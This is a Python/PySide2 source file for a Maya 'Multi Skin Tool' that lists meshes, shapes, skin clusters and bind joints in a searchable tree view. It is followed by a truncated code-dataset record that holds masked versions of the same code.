.closeTree, 0, pyQtDic['colorLightGrey'], '', self.hlayout[
'buttonsOptions'], '', 30]]
self.buttons = {}
for buttonName, buttonFunction, _, labColor, bgColor, layout, layout_coord, width in self.buttonAndFunctions:
self.buttons[buttonName] = adbRC.CustomQPushButton(buttonName)
self.buttons[buttonName].clicked.connect(buttonFunction)
try:
layout.addWidget(self.buttons[buttonName], int(layout_coord
.split(',')[0]), int(layout_coord.split(',')[1]))
except ValueError:
layout.addWidget(self.buttons[buttonName])
_optionsExpandAll = self.buttons['Expand All'].addButtonActions([
'Shapes', 'Skin Clusters'])
_optionsExpandAll['Shapes'].triggered.connect(lambda : self.
expandTree('shape'))
_optionsExpandAll['Skin Clusters'].triggered.connect(lambda : self.
expandTree('skin cluster'))
_optionsCloseAll = self.buttons['Close All'].addButtonActions([
'Shapes', 'Skin Clusters'])
_optionsCloseAll['Shapes'].triggered.connect(lambda : self.
closeTree('shape'))
_optionsCloseAll['Skin Clusters'].triggered.connect(lambda : self.
closeTree('skin cluster'))
def buildMainLayout(self):
self.main_layout.addLayout(self.hlayout['filterOptions'])
self.hlayout['filterOptions'].addWidget(self.allFilter)
self.hlayout['filterOptions'].addWidget(self.skinClusterFilter)
self.hlayout['filterOptions'].addStretch()
self.main_layout.addLayout(self.hlayout['searchBarWidget'])
self.hlayout['searchBarWidget'].addWidget(self.matchCaseChx)
self.main_layout.addLayout(self.hlayout['buttonsOptions'])
self.main_layout.addLayout(self.vlayout['treeWidget'])
def refreshQtree(self):
self.meshTreeWidget.clear()
all_status = self.allFilter.isChecked()
if all_status:
_filter = 'all'
else:
_filter = 'skinClusters'
self.filterList = self.filterMeshes(filter=_filter)
self.populateQTree(self.filterList)
def getSearchBarText(self):
searchBarText = self.searchBar.text()
return searchBarText
def searchBarEdited(self):
matchCase = bool(self.matchCaseChx.checkState())
query = self.searchBar.text()
if matchCase:
query_words = str(query).split(' ')
else:
query_words = str(query).lower().split(' ')
query_words = filter(None, query_words)
scoreList = {}
for item in [str(x) for x in self.filterList]:
score = 0
for query_word in query_words:
if matchCase:
if query_word in item:
score += 1
elif query_word in item.lower():
score += 1
scoreList[item] = score
sorted_matches = [i for i in scoreList.items() if i[1] >= len(
query_words)]
sorted_matches = sorted(sorted_matches, key=lambda x: x[0])
sorted_matches_string = [name for name, index in sorted_matches]
self.meshTreeWidget.clear()
self.populateQTree(sorted_matches_string)
def populateQTree(self, filterList):
self.roots = [QtWidgets.QTreeWidgetItem(self.meshTreeWidget, [str(
item)]) for item in filterList]
[root.setIcon(0, QtGui.QIcon(':/out_mesh.png')) for root in self.roots]
[root.setExpanded(True) for root in self.roots]
self.QtShapes = []
shape_dic = self.getAllShapes(self.getAllMeshes())
QTroots_dic = {}
for root in self.roots:
try:
QTroots_dic.update({root: shape_dic[root.text(0)]})
except KeyError:
pass
for QTroot, shapesList in QTroots_dic.items():
[QtWidgets.QTreeWidgetItem(QTroot, [str(shape)]) for shape in
shapesList]
child_count = QTroot.childCount()
children = [QTroot.child(index) for index in range(child_count)]
[child.setForeground(0, QtGui.QBrush(QtGui.QColor(YELLOW))) for
child in children]
[child.setIcon(0, QtGui.QIcon(':/out_transform.png')) for child in
children]
[child.setExpanded(True) for child in children]
[self.QtShapes.append(child) for child in children]
self.QTClusters = []
cluster_dic = self.getSkinClusterbyShape(flatList(shape_dic.values()))
QTshape_dic = {}
for shape in self.QtShapes:
QTshape_dic.update({shape: cluster_dic[shape.text(0)]})
for QTshape, clusterList in QTshape_dic.items():
if clusterList == 'None':
pass
else:
QtWidgets.QTreeWidgetItem(QTshape, [str(clusterList)])
child_count = QTshape.childCount()
children = [QTshape.child(index) for index in range(child_count)]
[child.setForeground(0, QtGui.QBrush(QtGui.QColor(GREEN))) for
child in children]
[child.setIcon(0, QtGui.QIcon(':/cluster.png')) for child in
children]
[self.QTClusters.append(child) for child in children]
bindJoints_dic = self.getBindJointsFromCluster([x for x in
cluster_dic.values() if x != 'None'])
QTcluster_dic = {}
for cluster in self.QTClusters:
QTcluster_dic.update({cluster: bindJoints_dic[cluster.text(0)]})
for QTCluster, jointList in QTcluster_dic.items():
[QtWidgets.QTreeWidgetItem(QTCluster, [str(jnt)]) for jnt in
jointList]
child_count = QTCluster.childCount()
children = [QTCluster.child(index) for index in range(child_count)]
[child.setForeground(0, QtGui.QBrush(QtGui.QColor(DARKRED))) for
child in children]
[child.setIcon(0, QtGui.QIcon(':/out_joint.png')) for child in
children]
def closeTree(self, type='mesh'):
if type == 'mesh':
[root.setExpanded(False) for root in self.roots]
elif type == 'shape':
[shape.setExpanded(False) for shape in self.QtShapes]
elif type == 'skin cluster':
[sclus.setExpanded(False) for sclus in self.QTClusters]
def expandTree(self, type='mesh'):
if type == 'mesh':
[root.setExpanded(True) for root in self.roots]
elif type == 'shape':
[shape.setExpanded(True) for shape in self.QtShapes]
elif type == 'skin cluster':
[sclus.setExpanded(True) for sclus in self.QTClusters]
def showSelected(self):
selection = pm.selected()
selection.sort()
self.meshTreeWidget.clear()
self.populateQTree(selection)
def singleClickedAction(self):
mySelection = self.meshTreeWidget.selectedItems()
str_selected = [x.text(0) for x in mySelection]
pm.select(str_selected, r=1)
def filterMeshes(self, filter='all'):
"""
filter:
all : all meshes
skinClusters : all meshes with skinClusters
None
"""
if filter == 'all':
return self.getAllMeshes()
elif filter == 'skinClusters':
clusters = pm.ls(type='skinCluster')
meshesShapes = set(sum([pm.skinCluster(c, q=1, geometry=1) for
c in clusters], []))
meshes = set([x.getParent() for x in meshesShapes if pm.
objectType(x) == 'mesh'])
return meshes
elif filter == 'None':
return None
@staticmethod
def test():
print('test')
@staticmethod
def getSkinCluster(_transform):
"""
Find a SkinCluster from a transform
Returns the skinCluster node
"""
result = []
if not pm.objExists(_transform):
return result
validList = mel.eval('findRelatedDeformer("' + str(_transform) + '")')
if validList is None:
return result
for elem in validList:
if pm.nodeType(elem) == 'skinCluster':
result.append(elem)
pm.select(result, r=True)
result_node = pm.selected()
if len(result_node) > 1:
return result_node
else:
try:
return result_node[0]
except IndexError:
return False
@staticmethod
def getBindJointsFromCluster(clusterList):
"""
Find all joints attached to a skinCluster
@param clusterList: List. list of skin Clusters
return dic with key: skin Cluster. Value: list of joint
"""
bindJoints_dic = {}
for cluster in clusterList:
all_binds_jnts = [x for x in pm.listConnections(str(cluster) +
'.matrix[*]', s=1)]
bindJoints_dic.update({str(cluster): all_binds_jnts})
return bindJoints_dic
@staticmethod
def getAllMeshes():
"""
return: list of all meshes / geometry
"""
shapesList = pm.ls(type='mesh', ni=1)
transformList = list(set(pm.listRelatives(shapesList, parent=True)))
transformList.sort()
return transformList
@staticmethod
def getAllShapes(transforms):
"""
@param transforms: List.
return : dictionnary with key:mesh / values: shapes
"""
shapes_dic = {}
for transform in transforms:
all_shapes = pm.PyNode(transform).getShapes(ni=True)
shapes_dic.update({str(transform): all_shapes})
return shapes_dic
def getSkinClusterbyShape(self, shapes):
"""
get skinCluster attached to the shape
@param shapes: List
return: List
"""
cluster_dic = {}
for shape in shapes:
try:
incoming = mc.listConnections('{}.inMesh'.format(shape))[0]
if pm.objectType(incoming) == 'skinCluster':
cluster_dic.update({str(shape): incoming})
else:
skinCluster = self.getSkinCluster(shape)
if skinCluster:
if len(skinCluster) > 1:
cluster_dic.update({str(shape): 'None'})
else:
cluster_dic.update({str(shape): skinCluster})
else:
cluster_dic.update({str(shape): 'None'})
except TypeError:
cluster_dic.update({str(shape): 'None'})
return cluster_dic
def showUI(dialog=False):
if dialog:
MultiSkin_UI.show_dialog()
else:
global tools_cw_ui
try:
tools_cw_ui.deleteLater()
except:
pass
tools_cw_ui = MultiSkin_UI()
tools_cw_ui.show()
<|reserved_special_token_1|>
from functools import wraps
import maya.cmds as mc
import maya.mel as mel
import pymel.core as pm
from PySide2 import QtCore, QtGui, QtWidgets
import adb_core.Class__multi_skin as ms
import adbrower
from CollDict import pysideColorDic as pyQtDic
from maya.app.general.mayaMixin import MayaQWidgetDockableMixin
import adb_tools.adb_pyQt.Class__rightClickCustom as adbRC
from maya_script import Adbrower
adb = adbrower.Adbrower()
VERSION = 1.0
PATH_WINDOW = Adbrower.PATH_WINDOW_INIT + 'AppData/Roaming'
PATH_LINUX = Adbrower.PATH_LINUX_INIT
FOLDER_NAME = Adbrower.FOLDER_NAME_INIT
ICONS_FOLDER = Adbrower.ICONS_FOLDER_INIT
YELLOW = '#ffe100'
ORANGE = '#fd651d'
GREEN = '#597A59'
DARKRED = '#745a54'
def undo(func):
'''
Puts the wrapped `func` into a single Maya Undo action, then
undoes it when the function enters the finally: block
from schworer Github
'''
@wraps(func)
def _undofunc(*args, **kwargs):
try:
# start an undo chunk
mc.undoInfo(ock=True)
return func(*args, **kwargs)
finally:
# after calling the func, end the undo chunk
mc.undoInfo(cck=True)
return _undofunc
def flatList(ori_list=''):
"""
Flatten a list
"""
flat_list = []
for item in ori_list:
if isinstance(item, list):
for sub_item in item:
flat_list.append(sub_item)
else:
flat_list.append(item)
return flat_list
#-----------------------------------
# CLASS
#-----------------------------------
class MultiSkin_UI(MayaQWidgetDockableMixin, QtWidgets.QDialog):
__dialog = None
@classmethod
def show_dialog(cls):
if cls.__dialog is None:
cls.__dialog = cls()
else:
cls.__dialog.raise_()
cls.__dialog.show()
def __init__(self,parent=None):
super(MultiSkin_UI, self).__init__(parent=parent)
self.meshTreeWidget=QtWidgets.QTreeWidget()
self.setObjectName('multi skin ui')
self.starting_height = 500
self.starting_width = 390
self.setWindowTitle('adbrower - Multi Skin Tool' + ' v' + str(VERSION))
self.setWindowFlags(QtCore.Qt.Tool)
self.setMinimumWidth(self.starting_width)
self.resize(self.starting_width, self.starting_height)
# -----------------------------
# --- Create scrollArea
self.mainBox = QtWidgets.QVBoxLayout()
self.mainBox.setContentsMargins(0, 0, 0, 0)
self.scroll_layout = QtWidgets.QScrollArea()
self.mainBox.addWidget(self.scroll_layout)
self.setLayout(self.mainBox)
self.scroll_layout.setContentsMargins(0, 0, 0, 0)
self.scroll_layout.setWidgetResizable(True)
self.scroll_layout.setFrameStyle(QtWidgets.QFrame.NoFrame)
self.scroll_layout.setFrameShadow(QtWidgets.QFrame.Plain)
self.scroll_widget = QtWidgets.QWidget()
self.scroll_layout.setWidget(self.scroll_widget)
# -----------------------------
# --- Main Layout
self.main_layout = QtWidgets.QVBoxLayout()
self.main_layout.setContentsMargins(*[5] * 4)
self.main_layout.setSpacing(2)
self.setLayout(self.main_layout)
self.scroll_widget.setLayout(self.main_layout)
self.widgetsAndLayouts()
self.create_Button()
self.buildMainLayout()
def widgetsAndLayouts(self):
# --------- Predefine widgets
def addLine():
line = QtWidgets. QFrame()
line.setFrameShape(QtWidgets.QFrame.HLine)
return line
def addText(message, alignement=QtCore.Qt.AlignCenter, height=30, bold=False):
myFont = QtGui.QFont()
myFont.setBold(bold)
text = QtWidgets.QLabel(message)
text.setAlignment(alignement)
text.setFixedHeight(height)
text.setFont(myFont)
return text
# ------------------------------
#--------- Layouts
self.vLayoutAndFunctions = [
# name, margins
['treeWidget', [1, 1, 1, 1]],
]
self.vlayout = {}
for layoutName, margins, in self.vLayoutAndFunctions:
self.vlayout[layoutName] = QtWidgets.QVBoxLayout()
self.vlayout[layoutName].setContentsMargins(margins[0], margins[1], margins[2], margins[3],)
self.hLayoutAndFunctions = [
# name, margins
['filterOptions', [1, 1, 1, 1]],
['buttonsOptions', [1, 1, 1, 1]],
['searchBarWidget', [1, 1, 1, 1]],
]
self.hlayout = {}
for layoutName, margins, in self.hLayoutAndFunctions:
self.hlayout[layoutName] = QtWidgets.QHBoxLayout()
self.hlayout[layoutName].setContentsMargins(margins[0], margins[1], margins[2], margins[3],)
# ------------------------------
# --------- QLINE EDIT WIDGET
self.searchBar = QtWidgets.QLineEdit()
self.searchBar.setPlaceholderText('Search...')
self.searchBar.textEdited.connect(self.searchBarEdited)
self.hlayout['searchBarWidget'].addWidget(self.searchBar)
# ------------------------------
# --------- CHECKBOX WIDGET
self.matchCaseChx = QtWidgets.QCheckBox()
self.matchCaseChx.setChecked(False)
self.matchCaseChx.setText('Match Case')
self.matchCaseChx.stateChanged.connect(self.searchBarEdited)
# ------------------------------
# --------- RADIO BUTTON WIDGET
self.allFilter = QtWidgets.QRadioButton('All', self)
self.allFilter.setChecked(True)
self.allFilter.toggled.connect(self.refreshQtree)
self.skinClusterFilter = QtWidgets.QRadioButton('Skin Clusters', self)
self.skinClusterFilter.setChecked(True)
self.skinClusterFilter.toggled.connect(self.refreshQtree)
# ------------------------------
# --------- TREE LIST WIDGET
self.meshTreeWidget=QtWidgets.QTreeWidget()
self.meshTreeWidget.setHeaderLabel('Cloth Tree View')
self.meshTreeWidget.setSelectionMode(self.meshTreeWidget.ExtendedSelection)
self.vlayout['treeWidget'].addWidget(self.meshTreeWidget)
header = QtWidgets.QTreeWidgetItem(["Geometries"])
self.meshTreeWidget.setHeaderItem(header)
self.meshTreeWidget.itemClicked.connect(self.singleClickedAction)
self.meshTreeWidget.itemSelectionChanged .connect(self.singleClickedAction)
self.refreshQtree()
def create_Button(self):
""" Create the buttons """
self.buttonAndFunctions = [
# name, function , group number, labelColor, backgroundColor, layout, layout_coordinate width
['Show Selected', self.showSelected, 0, pyQtDic['colorLightGrey'], '', self.hlayout['searchBarWidget'], '', 30],
['Refresh', self.refreshQtree, 0, pyQtDic['colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],
['Clear', self.meshTreeWidget.clear, 0, pyQtDic['colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],
['Expand All', self.expandTree, 0, pyQtDic['colorLightGrey'], '', self.hlayout['buttonsOptions'], '', 30],
['Close All', self.closeTree, 0, pyQtDic['colorLightGrey'], '', self.hlayout['buttonsOptions'], '', 30],
]
# Build Buttons
self.buttons = {}
for buttonName, buttonFunction, _, labColor, bgColor, layout, layout_coord, width, in self.buttonAndFunctions:
self.buttons[buttonName] = adbRC.CustomQPushButton(buttonName)
self.buttons[buttonName].clicked.connect(buttonFunction)
try:
layout.addWidget(self.buttons[buttonName], int(layout_coord.split(',')[0]), int(layout_coord.split(',')[1]))
except ValueError:
layout.addWidget(self.buttons[buttonName])
# add Right Clicked Options
_optionsExpandAll = self.buttons['Expand All'].addButtonActions(['Shapes', 'Skin Clusters'])
_optionsExpandAll['Shapes'].triggered.connect(lambda:self.expandTree('shape'))
_optionsExpandAll['Skin Clusters'].triggered.connect(lambda:self.expandTree('skin cluster'))
_optionsCloseAll = self.buttons['Close All'].addButtonActions(['Shapes', 'Skin Clusters'])
_optionsCloseAll['Shapes'].triggered.connect(lambda:self.closeTree('shape'))
_optionsCloseAll['Skin Clusters'].triggered.connect(lambda:self.closeTree('skin cluster'))
def buildMainLayout(self):
# ------------------------------
# --------- BUILD MAIN LAYOUT
self.main_layout.addLayout(self.hlayout['filterOptions'])
self.hlayout['filterOptions'].addWidget(self.allFilter)
self.hlayout['filterOptions'].addWidget(self.skinClusterFilter)
self.hlayout['filterOptions'].addStretch()
self.main_layout.addLayout(self.hlayout['searchBarWidget'])
self.hlayout['searchBarWidget'].addWidget(self.matchCaseChx)
self.main_layout.addLayout(self.hlayout['buttonsOptions'])
self.main_layout.addLayout(self.vlayout['treeWidget'])
# ==================================
# SLOTS
# ==================================
def refreshQtree(self):
self.meshTreeWidget.clear()
all_status = self.allFilter.isChecked()
if all_status:
_filter = 'all'
else:
_filter = 'skinClusters'
self.filterList = self.filterMeshes(filter=_filter)
self.populateQTree(self.filterList)
def getSearchBarText(self):
searchBarText = self.searchBar.text()
return searchBarText
def searchBarEdited(self):
matchCase=bool(self.matchCaseChx.checkState())
query = self.searchBar.text()
if matchCase:
query_words = str(query).split(" ")
else:
query_words = str(query).lower().split(" ")
query_words = filter(None, query_words)
scoreList = {}
for item in [str(x) for x in self.filterList]:
score = 0
for query_word in query_words:
if matchCase:
if query_word in item:
score += 1
else:
if query_word in item.lower():
score += 1
scoreList[item] = score
# If user enter more than one words, get only result with a score at least equal to the number of words in the query
sorted_matches = [i for i in scoreList.items() if i[1] >= len(query_words)]
# Sort matches by score
sorted_matches = sorted(sorted_matches, key=lambda x: x[0])
sorted_matches_string = [name for name, index in sorted_matches]
self.meshTreeWidget.clear()
self.populateQTree(sorted_matches_string)
def populateQTree(self, filterList):
# Meshes
# ----------------------
self.roots = [QtWidgets.QTreeWidgetItem(self.meshTreeWidget, [str(item)]) for item in filterList]
[root.setIcon(0, QtGui.QIcon(':/out_mesh.png')) for root in self.roots]
[root.setExpanded(True) for root in self.roots]
# Shapes
# ----------------------
self.QtShapes = []
shape_dic = self.getAllShapes(self.getAllMeshes())
QTroots_dic = {} # Keys are Qtree object
for root in self.roots:
try:
QTroots_dic.update({root:shape_dic[root.text(0)]})
except KeyError:
pass
# added the shapes under there mesh
for QTroot, shapesList in QTroots_dic.items():
[QtWidgets.QTreeWidgetItem(QTroot, [str(shape)]) for shape in shapesList]
# changed their color
child_count=QTroot.childCount()
children=[QTroot.child(index) for index in range(child_count)]
[child.setForeground(0, QtGui.QBrush(QtGui.QColor(YELLOW))) for child in children]
[child.setIcon(0, QtGui.QIcon(':/out_transform.png')) for child in children]
[child.setExpanded(True) for child in children]
[self.QtShapes.append(child) for child in children]
# skinClusters
# ----------------------
self.QTClusters = []
cluster_dic = self.getSkinClusterbyShape(flatList(shape_dic.values()))
QTshape_dic = {}
for shape in self.QtShapes:
QTshape_dic.update({shape:cluster_dic[shape.text(0)]})
# added the skinCluster under there shape
for QTshape, clusterList in QTshape_dic.items():
if clusterList == 'None':
pass
else:
QtWidgets.QTreeWidgetItem(QTshape, [str(clusterList)])
# changed their color
child_count=QTshape.childCount()
children=[QTshape.child(index) for index in range(child_count)]
[child.setForeground(0, QtGui.QBrush(QtGui.QColor(GREEN))) for child in children]
[child.setIcon(0, QtGui.QIcon(':/cluster.png')) for child in children]
[self.QTClusters.append(child) for child in children]
# Joints
# ----------------------
bindJoints_dic = self.getBindJointsFromCluster([x for x in cluster_dic.values() if x != 'None'])
QTcluster_dic = {}
for cluster in self.QTClusters:
QTcluster_dic.update({cluster:bindJoints_dic[cluster.text(0)]})
for QTCluster, jointList in QTcluster_dic.items():
[QtWidgets.QTreeWidgetItem(QTCluster, [str(jnt)]) for jnt in jointList]
# changed their color
child_count=QTCluster.childCount()
children=[QTCluster.child(index) for index in range(child_count)]
[child.setForeground(0, QtGui.QBrush(QtGui.QColor(DARKRED))) for child in children]
[child.setIcon(0, QtGui.QIcon(':/out_joint.png')) for child in children]
def closeTree(self, type='mesh'):
if type == 'mesh':
[root.setExpanded(False) for root in self.roots]
elif type == 'shape':
[shape.setExpanded(False) for shape in self.QtShapes]
elif type == 'skin cluster':
[sclus.setExpanded(False) for sclus in self.QTClusters]
def expandTree(self, type='mesh'):
if type == 'mesh':
[root.setExpanded(True) for root in self.roots]
elif type == 'shape':
[shape.setExpanded(True) for shape in self.QtShapes]
elif type == 'skin cluster':
[sclus.setExpanded(True) for sclus in self.QTClusters]
def showSelected(self):
selection = pm.selected()
selection.sort()
self.meshTreeWidget.clear()
self.populateQTree(selection)
def singleClickedAction(self):
mySelection = self.meshTreeWidget.selectedItems()
str_selected = [x.text(0) for x in mySelection]
pm.select(str_selected, r=1)
def filterMeshes(self, filter = 'all'):
"""
filter:
all : all meshes
skinClusters : all meshes with skinClusters
None
"""
if filter =='all':
return self.getAllMeshes()
elif filter == "skinClusters":
clusters = pm.ls(type='skinCluster')
meshesShapes = set(sum([pm.skinCluster(c, q=1, geometry=1) for c in clusters], []))
meshes = set([x.getParent() for x in meshesShapes if pm.objectType(x) == 'mesh'])
return meshes
elif filter == 'None':
return None
# ==================================
# STATIC METHOD
# ==================================
@staticmethod
def test():
print ('test')
@staticmethod
def getSkinCluster(_transform):
"""
Find a SkinCluster from a transform
Returns the skinCluster node
"""
result = []
if not (pm.objExists(_transform)):
return result
validList = mel.eval('findRelatedDeformer("' + str(_transform) + '")')
if validList is None:
return result
for elem in validList:
if pm.nodeType(elem) == 'skinCluster':
result.append(elem)
pm.select(result, r=True)
result_node = pm.selected()
if len(result_node) > 1:
return result_node
else:
try:
return result_node[0]
except IndexError:
return False
@staticmethod
def getBindJointsFromCluster(clusterList):
"""
Find all joints attached to a skinCluster
@param clusterList: List. list of skin Clusters
return dic with key: skin Cluster. Value: list of joint
"""
bindJoints_dic = {}
for cluster in clusterList:
all_binds_jnts = [x for x in pm.listConnections(str(cluster) + '.matrix[*]', s=1)]
bindJoints_dic.update({str(cluster):all_binds_jnts})
return bindJoints_dic
@staticmethod
def getAllMeshes():
"""
return: list of all meshes / geometry
"""
shapesList = pm.ls(type="mesh", ni=1)
transformList = list(set(pm.listRelatives(shapesList ,parent=True)))
transformList.sort()
return transformList
@staticmethod
def getAllShapes(transforms):
"""
@param transforms: List.
return : dictionnary with key:mesh / values: shapes
"""
shapes_dic = {}
for transform in transforms:
all_shapes = pm.PyNode(transform).getShapes(ni=True)
shapes_dic.update({str(transform):all_shapes})
return shapes_dic
def getSkinClusterbyShape(self, shapes):
"""
get skinCluster attached to the shape
@param shapes: List
return: List
"""
cluster_dic = {}
for shape in shapes:
try:
incoming = mc.listConnections('{}.inMesh'.format(shape))[0]
if pm.objectType(incoming) == 'skinCluster':
cluster_dic.update({str(shape):incoming})
else:
skinCluster = self.getSkinCluster(shape)
if skinCluster:
if len(skinCluster) > 1:
cluster_dic.update({str(shape):'None'})
else:
cluster_dic.update({str(shape):skinCluster})
else:
cluster_dic.update({str(shape):'None'})
except TypeError:
cluster_dic.update({str(shape):'None'})
return cluster_dic
# ===============================
# BUILD WINDOW
# ===============================
def showUI(dialog = False):
if dialog:
MultiSkin_UI.show_dialog()
else:
# Make sure the UI is deleted before recreating
global tools_cw_ui
try:
tools_cw_ui.deleteLater()
except:
pass
tools_cw_ui = MultiSkin_UI()
tools_cw_ui.show()
# showUI()
|
flexible
|
{
"blob_id": "819607d89035413fc2800e9f16222619a74a5d64",
"index": 6429,
"step-1": "<mask token>\n\n\nclass MultiSkin_UI(MayaQWidgetDockableMixin, QtWidgets.QDialog):\n <mask token>\n <mask token>\n <mask token>\n\n def widgetsAndLayouts(self):\n\n def addLine():\n line = QtWidgets.QFrame()\n line.setFrameShape(QtWidgets.QFrame.HLine)\n return line\n\n def addText(message, alignement=QtCore.Qt.AlignCenter, height=30,\n bold=False):\n myFont = QtGui.QFont()\n myFont.setBold(bold)\n text = QtWidgets.QLabel(message)\n text.setAlignment(alignement)\n text.setFixedHeight(height)\n text.setFont(myFont)\n return text\n self.vLayoutAndFunctions = [['treeWidget', [1, 1, 1, 1]]]\n self.vlayout = {}\n for layoutName, margins in self.vLayoutAndFunctions:\n self.vlayout[layoutName] = QtWidgets.QVBoxLayout()\n self.vlayout[layoutName].setContentsMargins(margins[0], margins\n [1], margins[2], margins[3])\n self.hLayoutAndFunctions = [['filterOptions', [1, 1, 1, 1]], [\n 'buttonsOptions', [1, 1, 1, 1]], ['searchBarWidget', [1, 1, 1, 1]]]\n self.hlayout = {}\n for layoutName, margins in self.hLayoutAndFunctions:\n self.hlayout[layoutName] = QtWidgets.QHBoxLayout()\n self.hlayout[layoutName].setContentsMargins(margins[0], margins\n [1], margins[2], margins[3])\n self.searchBar = QtWidgets.QLineEdit()\n self.searchBar.setPlaceholderText('Search...')\n self.searchBar.textEdited.connect(self.searchBarEdited)\n self.hlayout['searchBarWidget'].addWidget(self.searchBar)\n self.matchCaseChx = QtWidgets.QCheckBox()\n self.matchCaseChx.setChecked(False)\n self.matchCaseChx.setText('Match Case')\n self.matchCaseChx.stateChanged.connect(self.searchBarEdited)\n self.allFilter = QtWidgets.QRadioButton('All', self)\n self.allFilter.setChecked(True)\n self.allFilter.toggled.connect(self.refreshQtree)\n self.skinClusterFilter = QtWidgets.QRadioButton('Skin Clusters', self)\n self.skinClusterFilter.setChecked(True)\n self.skinClusterFilter.toggled.connect(self.refreshQtree)\n self.meshTreeWidget = QtWidgets.QTreeWidget()\n self.meshTreeWidget.setHeaderLabel('Cloth Tree View')\n self.meshTreeWidget.setSelectionMode(self.meshTreeWidget.\n ExtendedSelection)\n self.vlayout['treeWidget'].addWidget(self.meshTreeWidget)\n header = QtWidgets.QTreeWidgetItem(['Geometries'])\n self.meshTreeWidget.setHeaderItem(header)\n self.meshTreeWidget.itemClicked.connect(self.singleClickedAction)\n self.meshTreeWidget.itemSelectionChanged.connect(self.\n singleClickedAction)\n self.refreshQtree()\n\n def create_Button(self):\n \"\"\" Create the buttons \"\"\"\n self.buttonAndFunctions = [['Show Selected', self.showSelected, 0,\n pyQtDic['colorLightGrey'], '', self.hlayout['searchBarWidget'],\n '', 30], ['Refresh', self.refreshQtree, 0, pyQtDic[\n 'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],\n ['Clear', self.meshTreeWidget.clear, 0, pyQtDic[\n 'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],\n ['Expand All', self.expandTree, 0, pyQtDic['colorLightGrey'],\n '', self.hlayout['buttonsOptions'], '', 30], ['Close All', self\n .closeTree, 0, pyQtDic['colorLightGrey'], '', self.hlayout[\n 'buttonsOptions'], '', 30]]\n self.buttons = {}\n for buttonName, buttonFunction, _, labColor, bgColor, layout, layout_coord, width in self.buttonAndFunctions:\n self.buttons[buttonName] = adbRC.CustomQPushButton(buttonName)\n self.buttons[buttonName].clicked.connect(buttonFunction)\n try:\n layout.addWidget(self.buttons[buttonName], int(layout_coord\n .split(',')[0]), int(layout_coord.split(',')[1]))\n except ValueError:\n layout.addWidget(self.buttons[buttonName])\n _optionsExpandAll = self.buttons['Expand All'].addButtonActions([\n 'Shapes', 'Skin Clusters'])\n _optionsExpandAll['Shapes'].triggered.connect(lambda : self.\n expandTree('shape'))\n _optionsExpandAll['Skin Clusters'].triggered.connect(lambda : self.\n expandTree('skin cluster'))\n _optionsCloseAll = self.buttons['Close All'].addButtonActions([\n 'Shapes', 'Skin Clusters'])\n _optionsCloseAll['Shapes'].triggered.connect(lambda : self.\n closeTree('shape'))\n _optionsCloseAll['Skin Clusters'].triggered.connect(lambda : self.\n closeTree('skin cluster'))\n\n def buildMainLayout(self):\n self.main_layout.addLayout(self.hlayout['filterOptions'])\n self.hlayout['filterOptions'].addWidget(self.allFilter)\n self.hlayout['filterOptions'].addWidget(self.skinClusterFilter)\n self.hlayout['filterOptions'].addStretch()\n self.main_layout.addLayout(self.hlayout['searchBarWidget'])\n self.hlayout['searchBarWidget'].addWidget(self.matchCaseChx)\n self.main_layout.addLayout(self.hlayout['buttonsOptions'])\n self.main_layout.addLayout(self.vlayout['treeWidget'])\n\n def refreshQtree(self):\n self.meshTreeWidget.clear()\n all_status = self.allFilter.isChecked()\n if all_status:\n _filter = 'all'\n else:\n _filter = 'skinClusters'\n self.filterList = self.filterMeshes(filter=_filter)\n self.populateQTree(self.filterList)\n\n def getSearchBarText(self):\n searchBarText = self.searchBar.text()\n return searchBarText\n\n def searchBarEdited(self):\n matchCase = bool(self.matchCaseChx.checkState())\n query = self.searchBar.text()\n if matchCase:\n query_words = str(query).split(' ')\n else:\n query_words = str(query).lower().split(' ')\n query_words = filter(None, query_words)\n scoreList = {}\n for item in [str(x) for x in self.filterList]:\n score = 0\n for query_word in query_words:\n if matchCase:\n if query_word in item:\n score += 1\n elif query_word in item.lower():\n score += 1\n scoreList[item] = score\n sorted_matches = [i for i in scoreList.items() if i[1] >= len(\n query_words)]\n sorted_matches = sorted(sorted_matches, key=lambda x: x[0])\n sorted_matches_string = [name for name, index in sorted_matches]\n self.meshTreeWidget.clear()\n self.populateQTree(sorted_matches_string)\n <mask token>\n <mask token>\n\n def expandTree(self, type='mesh'):\n if type == 'mesh':\n [root.setExpanded(True) for root in self.roots]\n elif type == 'shape':\n [shape.setExpanded(True) for shape in self.QtShapes]\n elif type == 'skin cluster':\n [sclus.setExpanded(True) for sclus in self.QTClusters]\n\n def showSelected(self):\n selection = pm.selected()\n selection.sort()\n self.meshTreeWidget.clear()\n self.populateQTree(selection)\n\n def singleClickedAction(self):\n mySelection = self.meshTreeWidget.selectedItems()\n str_selected = [x.text(0) for x in mySelection]\n pm.select(str_selected, r=1)\n\n def filterMeshes(self, filter='all'):\n \"\"\"\n filter:\n all : all meshes\n skinClusters : all meshes with skinClusters\n None\n \"\"\"\n if filter == 'all':\n return self.getAllMeshes()\n elif filter == 'skinClusters':\n clusters = pm.ls(type='skinCluster')\n meshesShapes = set(sum([pm.skinCluster(c, q=1, geometry=1) for\n c in clusters], []))\n meshes = set([x.getParent() for x in meshesShapes if pm.\n objectType(x) == 'mesh'])\n return meshes\n elif filter == 'None':\n return None\n\n @staticmethod\n def test():\n print('test')\n\n @staticmethod\n def getSkinCluster(_transform):\n \"\"\"\n Find a SkinCluster from a transform\n Returns the skinCluster node\n \"\"\"\n result = []\n if not pm.objExists(_transform):\n return result\n validList = mel.eval('findRelatedDeformer(\"' + str(_transform) + '\")')\n if validList is None:\n return result\n for elem in validList:\n if pm.nodeType(elem) == 'skinCluster':\n result.append(elem)\n pm.select(result, r=True)\n result_node = pm.selected()\n if len(result_node) > 1:\n return result_node\n else:\n try:\n return result_node[0]\n except IndexError:\n return False\n\n @staticmethod\n def getBindJointsFromCluster(clusterList):\n \"\"\"\n Find all joints attached to a skinCluster\n @param clusterList: List. list of skin Clusters\n return dic with key: skin Cluster. Value: list of joint \n \"\"\"\n bindJoints_dic = {}\n for cluster in clusterList:\n all_binds_jnts = [x for x in pm.listConnections(str(cluster) +\n '.matrix[*]', s=1)]\n bindJoints_dic.update({str(cluster): all_binds_jnts})\n return bindJoints_dic\n\n @staticmethod\n def getAllMeshes():\n \"\"\"\n return: list of all meshes / geometry\n \"\"\"\n shapesList = pm.ls(type='mesh', ni=1)\n transformList = 